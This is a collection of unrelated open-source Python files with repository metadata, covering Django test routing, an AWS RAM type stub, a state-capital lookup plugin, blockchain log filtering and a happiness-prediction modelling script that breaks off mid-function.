def project_pseudo_lidar_to_rectcam(pts_3d):
xs, ys, zs = pts_3d[..., 0], pts_3d[..., 1], pts_3d[..., 2]
return torch.stack([-ys, -zs, xs], dim=-1)
def project_rect_to_image(pts_3d_rect, P):
n = pts_3d_rect.shape[0]
ones = torch.ones((n, 1), device=pts_3d_rect.device)
pts_3d_rect = torch.cat([pts_3d_rect, ones], dim=1)
pts_2d = torch.mm(pts_3d_rect, torch.transpose(P, 0, 1)) # nx3
pts_2d[:, 0] /= pts_2d[:, 2]
pts_2d[:, 1] /= pts_2d[:, 2]
return pts_2d[:, 0:2]
|
e85447f15f3aaa3644c2e18f875272be1a4b4748
|
4e582ab5fe95a22f87a66d6857c67c73f5bc9ea6
|
/tests/urls.py
|
bd2d5487277d6f2338415d792e332c4328d750bc
|
[
"MIT"
] |
permissive
|
yezyilomo/django-restql
|
678de8df1e49841c36362824f4c16f14a60f9945
|
a232d51bcaa51e8d70da1b35b051c3da1211dfb2
|
refs/heads/master
| 2023-07-04T16:50:25.459718
| 2022-11-02T19:28:53
| 2022-11-02T19:28:53
| 179,890,697
| 645
| 52
|
MIT
| 2022-11-02T19:28:54
| 2019-04-06T21:53:41
|
Python
|
UTF-8
|
Python
| false
| false
| 2,699
|
py
|
urls.py
|
"""test_app URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
try:
# For django <= 3.x
from django.conf.urls import include, url as path
except ImportError:
from django.urls import include, path
from tests.testapp import views
from rest_framework import routers
router = routers.DefaultRouter()
router.register('books', views.BookViewSet, 'book')
router.register('courses', views.CourseViewSet, 'course')
router.register('courses-with-disable-dynamic-fields', views.CourseWithDisableDaynamicFieldsKwargViewSet, 'course_with_disable_dynamic_fields_kwarg')
router.register('courses-with-returnpk-kwarg', views.CourseWithReturnPkkwargViewSet, 'course_with_returnpk_kwarg')
router.register('courses-with-field-kwarg', views.CourseWithFieldsKwargViewSet, 'course_with_field_kwarg')
router.register('courses-with-exclude-kwarg', views.CourseWithExcludeKwargViewSet, 'course_with_exclude_kwarg')
router.register('courses-with-aliased-books', views.CourseWithAliasedBooksViewSet, 'course_with_aliased_books')
router.register('course-with-dynamic-serializer-method-field', views.CourseWithDynamicSerializerMethodFieldViewSet, 'course_with_dynamic_serializer_method_field')
router.register('students', views.StudentViewSet, 'student')
router.register('students-eager-loading', views.StudentEagerLoadingViewSet, 'student_eager_loading')
router.register('students-eager-loading-prefetch', views.StudentEagerLoadingPrefetchObjectViewSet, 'student_eager_loading_prefetch')
router.register('students-auto-apply-eager-loading', views.StudentAutoApplyEagerLoadingViewSet, 'student_auto_apply_eager_loading')
router.register('writable-courses', views.WritableCourseViewSet, 'wcourse')
router.register('replaceable-students', views.ReplaceableStudentViewSet, 'rstudent')
router.register('replaceable-students-with-alias', views.ReplaceableStudentWithAliasViewSet, 'rstudent_with_alias')
router.register('writable-students', views.WritableStudentViewSet, 'wstudent')
router.register('writable-students-with-alias', views.WritableStudentWithAliasViewSet, 'wstudent_with_alias')
urlpatterns = [
path('', include(router.urls))
]
|
0ec7d4e7e8d2b9fcfba77c0e68ee6ec18ed20578
|
e03bce53de6f88c0e09f56e4fe11c36af0f1161f
|
/typings/awacs/ram.pyi
|
0035a06c97f8d5fc6330a678866324efaaaab802
|
[
"Apache-2.0"
] |
permissive
|
onicagroup/runway
|
20c31df9cbc1a1ffc5c9aa468ce5cf7d6ac7899f
|
0763b06aee07d2cf3f037a49ca0cb81a048c5deb
|
refs/heads/master
| 2023-08-30T22:35:54.113981
| 2023-08-29T14:13:35
| 2023-08-29T14:13:35
| 122,529,924
| 156
| 79
|
Apache-2.0
| 2023-09-13T13:43:50
| 2018-02-22T20:12:55
|
Python
|
UTF-8
|
Python
| false
| false
| 1,637
|
pyi
|
ram.pyi
|
"""
This type stub file was generated by pyright.
"""
from .aws import Action as BaseAction
from .aws import BaseARN
service_name = "AWS Resource Access Manager"
prefix = "ram"
class Action(BaseAction):
def __init__(self, action=...) -> None: ...
class ARN(BaseARN):
def __init__(self, resource=..., region=..., account=...) -> None: ...
AcceptResourceShareInvitation = Action("AcceptResourceShareInvitation")
AssociateResourceShare = Action("AssociateResourceShare")
AssociateResourceSharePermission = Action("AssociateResourceSharePermission")
CreateResourceShare = Action("CreateResourceShare")
DeleteResourceShare = Action("DeleteResourceShare")
DisassociateResourceShare = Action("DisassociateResourceShare")
DisassociateResourceSharePermission = Action("DisassociateResourceSharePermission")
EnableSharingWithAwsOrganization = Action("EnableSharingWithAwsOrganization")
GetPermission = Action("GetPermission")
GetResourcePolicies = Action("GetResourcePolicies")
GetResourceShareAssociations = Action("GetResourceShareAssociations")
GetResourceShareInvitations = Action("GetResourceShareInvitations")
GetResourceShares = Action("GetResourceShares")
ListPendingInvitationResources = Action("ListPendingInvitationResources")
ListPermissions = Action("ListPermissions")
ListPrincipals = Action("ListPrincipals")
ListResourceSharePermissions = Action("ListResourceSharePermissions")
ListResources = Action("ListResources")
RejectResourceShareInvitation = Action("RejectResourceShareInvitation")
TagResource = Action("TagResource")
UntagResource = Action("UntagResource")
UpdateResourceShare = Action("UpdateResourceShare")
|
e897c4e1cc8f833f5804774d8b5d1a7fa26d9214
|
c64fb4456932789dffd87eb6d07c8a43003ae987
|
/jarviscli/plugins/stateinfo.py
|
f2924b0772482a29e97fc9d9c586f18658d4654a
|
[
"MIT"
] |
permissive
|
sukeesh/Jarvis
|
9fb7fc14ebefa27203ebf9af005e236a0a32a292
|
369a0e00b8a6fbd1132657cf2da39220ce84207e
|
refs/heads/master
| 2023-08-09T12:25:38.009222
| 2023-07-02T20:17:48
| 2023-07-02T20:17:48
| 84,604,734
| 3,172
| 1,398
|
MIT
| 2023-09-13T16:37:44
| 2017-03-10T22:09:14
|
Python
|
UTF-8
|
Python
| false
| false
| 4,462
|
py
|
stateinfo.py
|
from plugin import plugin, alias
@alias("state capital", "state abbreviation")
@plugin("stateinfo")
class stateinfo:
"""
Get the postal abbreviation and state capital of a given U.S. state
    Usage: stateinfo [state]
Aliases: state
state capital
state abbreviation
"""
def __call__(self, jarvis, s):
capital_dict = {
'alabama': 'montgomery',
'alaska': 'juneau',
'arizona': 'phoenix',
'arkansas': 'little rock',
'california': 'sacramento',
'colorado': 'denver',
'connecticut': 'hartford',
'delaware': 'dover',
'florida': 'tallahassee',
'georgia': 'atlanta',
'hawaii': 'honolulu',
'idaho': 'boise',
            'illinois': 'springfield',
            'indiana': 'indianapolis',
            'iowa': 'des moines',
'kansas': 'topeka',
'kentucky': 'frankfort',
'louisiana': 'baton rouge',
'maine': 'augusta',
'maryland': 'annapolis',
'massachusetts': 'boston',
'michigan': 'lansing',
'minnesota': 'st. paul',
'mississippi': 'jackson',
'missouri': 'jefferson city',
'montana': 'helena',
'nebraska': 'lincoln',
            'nevada': 'carson city',
'new hampshire': 'concord',
'new jersey': 'trenton',
'new mexico': 'santa fe',
'new york': 'albany',
'north carolina': 'raleigh',
'north dakota': 'bismarck',
'ohio': 'columbus',
'oklahoma': 'oklahoma city',
'oregon': 'salem',
'pennsylvania': 'harrisburg',
            'rhode island': 'providence',
            'south carolina': 'columbia',
            'south dakota': 'pierre',
'tennessee': 'nashville',
'texas': 'austin',
'utah': 'salt lake city',
'vermont': 'montpelier',
'virginia': 'richmond',
'washington': 'olympia',
'west virginia': 'charleston',
'wisconsin': 'madison',
'wyoming': 'cheyenne'
}
abbrev_dict = {
'alabama': 'al',
'alaska': 'ak',
'american samoa': 'as',
'arizona': 'az',
'arkansas': 'ar',
'california': 'ca',
'colorado': 'co',
'connecticut': 'ct',
'delaware': 'de',
'district of columbia': 'dc',
'florida': 'fl',
'georgia': 'ga',
'guam': 'gu',
'hawaii': 'hi',
'idaho': 'id',
'illinois': 'il',
'indiana': 'in',
'iowa': 'ia',
'kansas': 'ks',
'kentucky': 'ky',
'louisiana': 'la',
'maine': 'me',
'maryland': 'md',
'massachusetts': 'ma',
'michigan': 'mi',
'minnesota': 'mn',
'mississippi': 'ms',
'missouri': 'mo',
'montana': 'mt',
'nebraska': 'ne',
'nevada': 'nv',
'new hampshire': 'nh',
'new jersey': 'nj',
'new mexico': 'nm',
'new york': 'ny',
'north carolina': 'nc',
'north dakota': 'nd',
'northern mariana islands': 'mp',
'ohio': 'oh',
'oklahoma': 'ok',
'oregon': 'or',
'pennsylvania': 'pa',
'puerto rico': 'pr',
'rhode island': 'ri',
'south carolina': 'sc',
'south dakota': 'sd',
'tennessee': 'tn',
'texas': 'tx',
'utah': 'ut',
'vermont': 'vt',
'virgin islands': 'vi',
'virginia': 'va',
'washington': 'wa',
'west virginia': 'wv',
'wisconsin': 'wi',
'wyoming': 'wy'
}
if s:
try:
capital = capital_dict[s].title()
abbreviation = abbrev_dict[s].upper()
jarvis.say("The capital of " + s.title() + " is " + capital)
jarvis.say("The postal abbreviation is " + abbreviation)
except KeyError:
jarvis.say("Please enter a valid U.S. state")
else:
jarvis.say("Please input a state. Usage: stateinfo [state]")
|
d3b0fc64d61f0b2303ffe7d19f5d98b2dbd4f725
|
ccb0740c4846e943003b075bddd52fd7c884b6d8
|
/auto_pose/ae/ae_init_workspace.py
|
2810290b2731be6448e3049c9bdf0b783c5dcdbd
|
[
"MIT"
] |
permissive
|
DLR-RM/AugmentedAutoencoder
|
87a8bc5e32832cadbbfaafca8e19f15f2ce7718a
|
9f0a56f622fabf6200d9f034fcb2eef106997118
|
refs/heads/master
| 2022-09-12T08:51:59.086448
| 2022-08-16T09:43:02
| 2022-08-16T09:43:02
| 156,195,670
| 347
| 106
|
MIT
| 2022-06-22T00:55:31
| 2018-11-05T09:56:25
|
Python
|
UTF-8
|
Python
| false
| false
| 1,154
|
py
|
ae_init_workspace.py
|
# -*- coding: utf-8 -*-
import os
import glob
import shutil
from . import utils as u
def main():
workspace_path = os.environ.get('AE_WORKSPACE_PATH')
if workspace_path == None:
print('Please define a workspace path:\n')
print('export AE_WORKSPACE_PATH=/path/to/workspace\n')
exit(-1)
if len(os.listdir(workspace_path)) > 0:
print('\n[Error] Workspace folder needs to be empty.\n')
exit(-1)
cfg_path = os.path.join(workspace_path, 'cfg' )
eval_cfg_path = os.path.join(workspace_path, 'cfg_eval' )
experiments_path = os.path.join(workspace_path, 'experiments' )
dataset_path = os.path.join(workspace_path, 'tmp_datasets' )
this_dir = os.path.dirname(os.path.abspath(__file__))
if not os.path.exists(cfg_path):
cfg_template_path = os.path.join(this_dir, 'cfg')
shutil.copytree(cfg_template_path, cfg_path)
if not os.path.exists(eval_cfg_path):
eval_cfg_template_path = os.path.join(this_dir, 'cfg_eval')
shutil.copytree(eval_cfg_template_path, eval_cfg_path)
if not os.path.exists(experiments_path):
os.makedirs(experiments_path)
if not os.path.exists(dataset_path):
os.makedirs(dataset_path)
|
6a3166ea0a330d0aa7a32918e221ac6ab43cde26
|
88dd4380e0d33d4a118ca4e69e4ca9b1c8f45e1f
|
/pyspedas/de2/config.py
|
ef2b881b78af31487e9481cd6fc326e6ae3a1a45
|
[
"MIT"
] |
permissive
|
spedas/pyspedas
|
16d34015961e3a4d3eaf8637d3cb6abca95df1b1
|
1d07b148753afa96e148c5835ed9545c507577da
|
refs/heads/master
| 2023-09-01T16:07:47.131334
| 2023-08-25T17:15:35
| 2023-08-25T17:15:35
| 167,614,292
| 125
| 61
|
MIT
| 2023-09-08T18:41:27
| 2019-01-25T21:11:14
|
Python
|
UTF-8
|
Python
| false
| false
| 407
|
py
|
config.py
|
import os
CONFIG = {'local_data_dir': 'de2_data/',
'remote_data_dir': 'https://spdf.gsfc.nasa.gov/pub/data/de/de2/'}
# override local data directory with environment variables
if os.environ.get('SPEDAS_DATA_DIR'):
CONFIG['local_data_dir'] = os.sep.join([os.environ['SPEDAS_DATA_DIR'], 'de2'])
if os.environ.get('DE2_DATA_DIR'):
CONFIG['local_data_dir'] = os.environ['DE2_DATA_DIR']
|
f670234cb7522f50115fd69955bf551634b4a765
|
5770a3fc8bd224d926d4aff5b7d8f1863f145cab
|
/quarkchain/cluster/log_filter.py
|
764a260177201d7ef6c32bae4e6159529af1ae7b
|
[
"MIT"
] |
permissive
|
QuarkChain/pyquarkchain
|
d06a59d630fd0c4a07e1c10548ba044329da95ba
|
2068153c9386a1eacb5eccb8cf93d98f87537203
|
refs/heads/master
| 2023-02-27T14:16:07.419575
| 2022-04-18T20:35:59
| 2022-04-18T20:35:59
| 143,354,339
| 253
| 133
|
MIT
| 2023-02-07T21:54:01
| 2018-08-02T23:28:47
|
Python
|
UTF-8
|
Python
| false
| false
| 6,320
|
py
|
log_filter.py
|
import time
from typing import List, Optional
from quarkchain.cluster.shard_db_operator import ShardDbOperator
from quarkchain.core import Address, Log, MinorBlock, MinorBlockHeader
from quarkchain.evm.bloom import bloom
from quarkchain.utils import Logger
class LogFilter:
"""
Filter class for logs, blocks, pending tx, etc.
TODO: For now only supports filtering logs.
"""
TIMEOUT = 10 # seconds
@classmethod
def create_from_block_candidates(cls, db, addresses, topics, candidate_blocks):
return LogFilter(db, addresses, topics, candidate_blocks=candidate_blocks)
@classmethod
def create_from_end_block_header(
cls, db, addresses, topics, end_block_header, size
):
return LogFilter(
db, addresses, topics, end_block_header=end_block_header, size=size
)
def __init__(
self,
db: ShardDbOperator,
addresses: List[Address],
topics: List[List[bytes]],
end_block_header: Optional[MinorBlockHeader] = None,
size: int = 0,
candidate_blocks: Optional[List[MinorBlock]] = None,
block_hash: Optional[str] = None,
):
"""
`topics` is a list of lists where each one expresses the OR semantics,
while the whole list itself is connected by AND. For details check the
Ethereum JSONRPC spec.
"""
self.db = db
# if `addresses` present, should be in the same shard
self.recipients = [addr.recipient for addr in addresses]
self.end_block_header = end_block_header
self.size = size
self.candidate_blocks = candidate_blocks
# in case filter is instantiated through constructor instead of factory methods
if candidate_blocks is not None and (end_block_header is not None or size != 0):
raise ValueError(
"Should pass in either candidate blocks or end block header and size"
)
if candidate_blocks is not None:
self.candidate_blocks = sorted(
candidate_blocks, key=lambda x: x.header.height
)
self.block_hash = block_hash # TODO: not supported yet
# construct bloom bits:
# innermost: an integer with 3 bits set
# outer: a list of those integers are connected by OR operator
# outermost: a list of those lists are connected by AND operator
self.bloom_bits = [] # type: List[List[int]]
for r in self.recipients:
b = bloom(r)
self.bloom_bits.append([b])
self.topics = topics
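        # Illustrative note (not in the original file; topic values are made
        # up): with topics = [[b"A", b"B"], [], [b"C"]] a log matches when its
        # first topic is A or B, its second topic is anything (an empty list
        # acts as a wildcard), and its third topic is C -- OR inside each
        # inner list, AND across the outer list.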
for tp_list in topics:
if not tp_list:
# regard as wildcard
continue
bloom_list = []
for tp in tp_list:
bloom_list.append(bloom(tp))
self.bloom_bits.append(bloom_list)
# a timestamp to control timeout. will be set upon running
self.start_ts = None
def _get_block_candidates(self) -> List[MinorBlock]:
"""Use given criteria to generate potential blocks matching the bloom."""
def should_skip(block: MinorBlock) -> bool:
should_skip_block = False
# same byte order as in bloom.py
header_bloom = block.header.bloom
for bit_list in self.bloom_bits:
if not any((header_bloom & i) == i for i in bit_list):
should_skip_block = True
break
return should_skip_block
ret = []
if self.candidate_blocks is not None:
ret = [b for b in self.candidate_blocks if not should_skip(b)]
else:
end_block_hash = self.end_block_header.get_hash()
for i in range(self.size):
block = self.db.get_minor_block_by_hash(end_block_hash)
if not block:
Logger.error(
"No block found for height {} at shard {}".format(
i, self.db.branch.get_full_shard_id()
)
)
continue
if not should_skip(block):
ret.append(block)
end_block_hash = block.header.hash_prev_block
ret = list(reversed(ret))
return ret
def _get_logs(self, blocks: List[MinorBlock]) -> List[Log]:
"""Given potential blocks, re-run tx to find exact matches."""
ret = []
for b_i, block in enumerate(blocks):
tx_list_len = len(block.tx_list)
deposit_hlist = self.db.get_xshard_deposit_hash_list(
block.header.get_hash()
)
deposit_hlist_len = 0 if not deposit_hlist else len(deposit_hlist.hlist)
for i in range(tx_list_len + deposit_hlist_len):
# only provide deposit list when needed
r = block.get_receipt(
self.db.db, i, None if i < tx_list_len else deposit_hlist
)
for log in r.logs:
# empty recipient means no filtering
if self.recipients and log.recipient not in self.recipients:
continue
if self._log_topics_match(log):
ret.append(log)
if (1 + b_i) % 100 == 0 and time.time() - self.start_ts > LogFilter.TIMEOUT:
raise Exception("Filter timeout")
return ret
def _log_topics_match(self, log: Log) -> bool:
"""Whether a log matches given criteria in constructor. Position / order matters."""
# https://github.com/ethereum/wiki/wiki/JSON-RPC#a-note-on-specifying-topic-filters
for criteria, log_topic in zip(self.topics, log.topics):
if not criteria:
continue
if isinstance(criteria, list): # list of bytes
if not any(c == log_topic for c in criteria):
return False
else: # single criteria as bytes
if criteria != log_topic:
return False
return True
def run(self) -> List[Log]:
self.start_ts = time.time()
candidate_blocks = self._get_block_candidates()
logs = self._get_logs(candidate_blocks)
return logs
|
e8d17295c83e81cb437acae1d3e3cf7c77fde24e
|
0218f8cf2751e1662ee69f526ec6995ee657092d
|
/src/tasks/tianchi/happiness/test.py
|
41333e26d5fa1c1c5a34bd7dc251af879ba6b3d5
|
[] |
no_license
|
lipengyuer/DataScience
|
d8996004366907bfa6e303b879a452772cfedb48
|
52af044150d362c81f6c94617170a759f54ef9c5
|
refs/heads/master
| 2022-01-19T05:42:23.517231
| 2022-01-08T10:12:43
| 2022-01-08T10:12:43
| 157,036,574
| 116
| 60
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 15,526
|
py
|
test.py
|
import pandas as pd
import sklearn as sk
from sklearn.ensemble import RandomForestClassifier, RandomForestRegressor
from sklearn.model_selection import train_test_split
from sklearn.linear_model import SGDClassifier
from sklearn.ensemble import GradientBoostingClassifier, AdaBoostClassifier, GradientBoostingRegressor
from sklearn.neural_network import MLPClassifier
from sklearn.model_selection import KFold
from sklearn.feature_selection import SelectKBest
from sklearn.feature_selection import chi2
from scipy.stats import pearsonr
import otherData
import numpy as np
from sklearn.utils.class_weight import compute_class_weight
from sklearn.model_selection import GridSearchCV
features = None
def findNearInt(f):
anInt = int(f)
gaps = [anInt - f, anInt + 1 - f]
if np.abs(gaps[0]) < np.abs(gaps[1]):
return anInt
else:
return anInt + 1
def processHeight(h):
if h<150: return 1
    elif 150<=h<160: return 2
    elif 160<=h<170: return 3
    elif 170<=h<180: return 4
else: return 5
def processWeight(w):
if w<70: return 1
    elif 70<=w<90: return 2
    elif 90<=w<110: return 3
    elif 110<=w<130: return 4
else: return 5
def cal_BMI_index(h, w):
h = h/100
w = w/2
if h<1 or h>3: h=1.7
if w<30 or w>150: w=75
bmi = w/h**2
return bmi
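# Worked example for cal_BMI_index (illustrative numbers): h=170 cm and w=130 jin
# become 1.7 m and 65 kg, so bmi = 65 / 1.7**2, i.e. roughly 22.5.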
def ifTooShort(gender, height):
if gender==1:
if height<165: return 1
else: return 0
else:
if height<160: return 1
else: return 0
def ifTooHight(gender, height):
if gender==1:
if height>195: return 1
else: return 0
else:
        if height>185: return 1
else: return 0
def ifTooHeavy(gender, weight):
if gender==1:
if weight>200: return 1
else: return 0
else:
if weight>140: return 1
else: return 0
def ifTooLight(gender, weight):
if gender==1:
if weight<100: return 1
else: return 0
else:
if weight<70: return 1
else: return 0
def processAge(age):
if age<25: return 1
if 25<=age<30: return 2
if 30<=age<40: return 3
if 40 <= age < 60: return 4
if 60 <= age < 70: return 5
if age>=70: return 6
def featureEngineering(data):
global features
data['no_income'] = data['income'].apply(lambda x: 1 if x <0 else 0)
data['income'] = data['income'].apply(lambda x: 1000000 if x > 1000000 else x)\
.apply(lambda x: 1000 if x <1000 else x)
data['income'] = data['income'] / 10000
data['inc_exp'] /= 10000
data['inc_exp_gap'] = data['inc_exp']/data['income']
data['inc_exp_gap_neg'] = data['inc_exp_gap'].apply(lambda x: 1 if x<1 else 0)
data['no_s_income'] = data['s_income'].apply(lambda x: 1 if x < 0 else 0)
data['s_income'] = data['s_income'].apply(lambda x: 1000000 if x>1000000 else x)\
.apply(lambda x: 10000 if x < 1000 else x)
data['s_income'] = data['s_income'] / 10000
data['ratio_s_income'] = data['income']/ data['s_income']
data['no_family_income'] = data['family_income'].apply(lambda x: 1 if x < 0 else 0)
data['family_income'] = data['family_income'].apply(lambda x: 1000000 if x>1000000 else x).\
apply(lambda x: 1000 if x<1000 else x)
data['family_income'] = data['family_income'] / 10000
data['ratio_income_in_family'] = data['income']*data['family_m']/data['family_income']
data = data.fillna(-1)
# data['s_birth'] = data['s_birth'].apply(lambda x: 2015 if x<1900 else x)
# data['f_birth'] = data['f_birth'].apply(lambda x: 2015 if x < 1900 else x)
# data['m_birth'] = data['m_birth'].apply(lambda x: 2015 if x < 1900 else x)
data['birth'] = data['birth'].apply(lambda x: 2015 if x < 1900 else x)
data['s_birth'] = data.apply(lambda x: x['birth'] if x['s_birth']<0 else x['s_birth'], axis=1)
data['f_birth'] = data.apply(lambda x: x['birth']-20 if x['f_birth']<0 else x['f_birth'], axis=1)
data['m_birth'] = data.apply(lambda x: x['birth']-20 if x['m_birth']<0 else x['m_birth'], axis=1)
data['f_m_birth_delta'] = data['f_birth'] - data['m_birth']
data['f_birth_delta'] = data['birth'] - data['f_birth']
data['m_birth_delta'] = data['birth'] - data['m_birth']
data['birth'] = 2015 - data['birth']
data['s_birth'] = 2015 - data['s_birth']
data['f_birth'] = 2015 - data['f_birth']
data['m_birth'] = 2015 - data['m_birth']
data['is_nianqingren'] = data['birth'].apply(lambda x: 1 if x < 25 and x>20 else 0)
data['is_laoren'] = data['birth'].apply(lambda x: 1 if x > 70 else 0)
data['if_retired'] = data['birth'] - 60
data['if_retired'] = data['if_retired'].apply(lambda x: 0 if x < 0 else 1)
data['s_birth'] = data['s_birth'].apply(lambda x: 100 if x > 90 else x)
data['birth'] = data['birth'].apply(lambda x: 100 if x > 100 else x)
data['realBirth'] = data['birth']
data['s_birth'] = data['s_birth'].apply(processAge)
data['birth'] = data['birth'].apply(processAge)
data = data.drop(['f_birth', 's_birth'], axis=1)
# print(data['f_birth_delta'].describe())
#print(data[data['f_birth_delta']<0])
data['inc_exp'] = data['inc_exp'].apply(lambda x: 10000 if x <0 else x)
data['inc_exp'] = data['inc_exp']/10000
data['inc_ability'] = data['inc_ability'].apply(lambda x: 2 if x< 0 else x)
data['marital_1st'] = data['marital_1st'].apply(lambda x: 2015 if x==9997 else x)
data['marital_now'] = data['marital_now'].apply(lambda x: 2015 if x == 9997 else x)
data['marital_1st'] = 2015 - data['marital_1st']
data['marital_now'] = 2015 - data['marital_now']
data['bmi'] = data['weight_jin'] / (data['height_cm'] * data['height_cm'] / 20000)
data['is_too_short'] = data.apply(lambda x: ifTooShort(x.gender, x.height_cm), axis=1)
data['is_too_heavy'] = data.apply(lambda x: ifTooHeavy(x.gender, x.weight_jin), axis=1)
data['is_too_hight'] = data.apply(lambda x: ifTooHight(x.gender, x.height_cm), axis=1)
data['is_too_light'] = data.apply(lambda x: ifTooLight(x.gender, x.weight_jin), axis=1)
data['bmi_index'] = data.apply(lambda x: cal_BMI_index(x.height_cm, x.weight_jin), axis=1)
data['height_cm'] = data['height_cm'].apply(processHeight)
data['weight_jin'] = data['weight_jin'].apply(processWeight)
data['join_party'] = data['join_party'].apply(lambda x: 2015 if x==-1 else x)
data['join_party'] = 2015 - data['join_party']
data['join_party_if'] = data['join_party'].apply(lambda x: 1 if x ==0 else 0)
data['house'] = data['house'].apply(lambda x: -1 if x==96 else x)
data['family_income'] = data['family_income'].apply(lambda x: -1 if x == 99999996 else x)
data['floor_area_per'] = data['floor_area']/data['family_m']
data['class_change_before'] = data['class'] - data['class_10_before']
data['class_change_after'] = data['class_10_after'] - data['class']
data['class_change214'] = data['class'] - data['class_14']
data['edu_yr'] = 2015- data['edu_yr']
data['age_highest_edu'] = data['edu_yr'] - data['birth']
data['f_edu'] = data['f_edu'].apply(lambda x: 1 if x < 0 else x)
data['m_edu'] = data['m_edu'].apply(lambda x: 1 if x < 0 else x)
data['edu'] = data['edu'].apply(lambda x: 1 if x < 0 else x)
data['f_m_edu_gap'] = data['f_edu'] - data['m_edu']
data['f_edu_gap'] = data['edu'] - data['f_edu']
data['m_edu_gap'] = data['edu'] - data['m_edu']
data['status_peer_low'] = data['status_peer'].apply(lambda x: 1 if x==3 else 0)
data['status_peer_high'] = data['status_peer'].apply(lambda x: 1 if x == 1 else 0)
data['status_3_before_low'] = data['status_3_before'].apply(lambda x: 1 if x == 3 else 0)
data['status_3_before_high'] = data['status_3_before'].apply(lambda x: 1 if x == 1 else 0)
data['inc_ability_in'] = data['inc_ability'].apply(lambda x: 1 if x == 4 else 0)
data['trust_5_neg'] = data['trust_5'].apply(lambda x: 1 if x == 1 else 0)
data['trust_8_neg'] = data['trust_5'].apply(lambda x: 1 if x == 1 else 0)
data['trust_13_neg'] = data['trust_5'].apply(lambda x: 1 if x == 1 else 0)
data['family_status_neg'] = data['family_status'].apply(lambda x: 1 if x == 1 else 0)
data['first_job_age'] = data['birth'] - data['work_yr']
data['equity_neg'] = data['equity'].apply(lambda x: 1 if x == 1 else 0)
data['depression_neg'] = data['depression'].apply(lambda x: 1 if x == 1 else 0)
data['body_metal_neg'] = data.\
apply(lambda x: 1 if x['depression'] == 1 and x['health_problem']==1 else 0,\
axis=1)
data['leisure'] = data.apply(lambda x: 1 if x['leisure_1'] + x['leisure_2'] +\
x['leisure_3'] + x['leisure_4'] + x['leisure_5'] < 10 else 0, axis=1)
pub_servce_fs = ['public_service_1','public_service_2','public_service_3','public_service_4','public_service_5','public_service_6','public_service_7','public_service_8','public_service_9']
data[pub_servce_fs] = data[pub_servce_fs].applymap(lambda x: 50 if x < 0 else x)
data[pub_servce_fs] /= 20
data[pub_servce_fs] = data[pub_servce_fs].applymap(lambda x: int(x))
trustFs = ['trust_' + str(i) for i in range(1, 14)]
data[trustFs] = data[trustFs].applymap(lambda x: 1 if x<0 else x)
# data = data.applymap(lambda x: 0 if type(x)==str else x in y)
#print(data.dtypes)
#print(data.values.shape, 'qwe')
data = otherData.addOtherData(data)
stopFeatures = ['invest_other', 'property_other', 'edu_other', 'survey_time', 'realBirth']
#'province','city', 'county', 'nationality',
data = data.drop(stopFeatures, axis=1)
# features = ['income', 'gender', 'religion', 'edu']
    if features is None:
features = []
for featureName in data.columns:
#print(featureName, data.dtypes[featureName])
# if data.dtypes[featureName]==int:
# if 'income' in featureName or 'GDP' in featureName:
features.append(featureName)
data = data[features]
return data
def stastics(data):
print(data.groupby(['happiness']).count())
def loadData(fileName):
data = pd.read_csv(fileName)
data = data.drop(['id'], axis=1)
stastics(data)
data = data[data['happiness']>0]
#print(data[['f_birth']])
data = data.fillna(-1)
y = data[['happiness']]
data = data.drop(['happiness'], axis=1)
x = featureEngineering(data)
print("age is : ", x['birth'].describe())
# print(x.columns)
# trainX, testX, trainY, testY = train_test_split(x, y, test_size=0.2)
return x,y#trainX, testX, trainY, testY
def loadContestData(fileName):
data = pd.read_csv(fileName)
res = data[['id']]
data = data.drop(['id'], axis=1)
data = featureEngineering(data)
return res, data
def evaluation(pred, y):
count = 0
cost = 0
for i in range(len(y)):
if pred[i]==y[i][0]: count += 1
cost += (pred[i]-y[i][0])**2
#print(pred[i], y[i][0])
cost /= len(y)
#print(count/len(y))
return count/len(y), cost
from sklearn.tree import DecisionTreeClassifier
import time
def KFoldTest(trainX, trainY):
kf = KFold(n_splits=10, random_state=int(time.time()))
totalAcc = 0
totalTrainingAcc = 0
cost = 0
trainingCost = 0
for trainIndex, testIndex in kf.split(trainX):
# print(trainX.size, trainY.size)
trainInput, trainOutput = trainX.iloc[trainIndex], trainY.iloc[trainIndex]
# print(trainInput['edu_yr'])
testInput, testOutput = trainX.iloc[testIndex], trainY.iloc[testIndex]
weight = compute_class_weight('balanced',[1,2,3,4,5], list(map(lambda x: x[0], trainOutput.values)))
weight = [[i+1, weight[i]] for i in range(len(weight))]
weight = dict(weight)
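        # The hard-coded weights below are inverse class frequencies taken from
        # the label counts quoted at the bottom of this file
        # (104 / 497 / 1159 / 4818 / 1410), softened by the 0.55 exponent applied next.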
weight = {1:1/104, 2:1/497, 3:1/1159, 4:1/4818, 5:1/1410}
for key in weight: weight[key] = weight[key]**0.55
# clf = RandomForestRegressor(n_estimators=200, max_depth=7, n_jobs=8, criterion='mse', \
# max_features=0.3, bootstrap=False)
# clf = AdaBoostClassifier(DecisionTreeClassifier(max_depth=10),
# algorithm="SAMME",
# n_estimators=200)
# clf = GradientBoostingClassifier( n_estimators=500, learning_rate=.01, max_depth=10,
    #                        random_state=int(time.time()), max_features=0.3,\
# min_samples_leaf=20, subsample=0.9)
clf = GradientBoostingRegressor(loss='huber', n_estimators=200, learning_rate=.01,
max_depth=10,
random_state=int(time.time()), max_features=0.5,\
min_samples_leaf=30, subsample=0.5)
clf.fit(trainInput, trainOutput.values)
pred = clf.predict(trainInput)
trainacc, traincostn = evaluation(pred, trainOutput.values)
pred = clf.predict(testInput)
acc, costn = evaluation(pred, testOutput.values)
print("training acc", trainacc, traincostn,trainOutput.size, 'testing acc', acc, costn ,testOutput.size)
totalAcc += acc
cost += costn
totalTrainingAcc += trainacc
trainingCost += traincostn
print("k-fold crossvalidation:", totalAcc/10, 'cost is', cost/10)
print("in training is ", totalTrainingAcc/10, trainingCost/10)
def gridSearch(trainX, trainY):
parameters = {'loss':['ls'], 'n_estimators':[1000],
'learning_rate':[0.01, 0.008], 'max_depth':[10, 15, 20],
'random_state':[int(time.time())], 'max_features':[0.1,0.2,0.3],
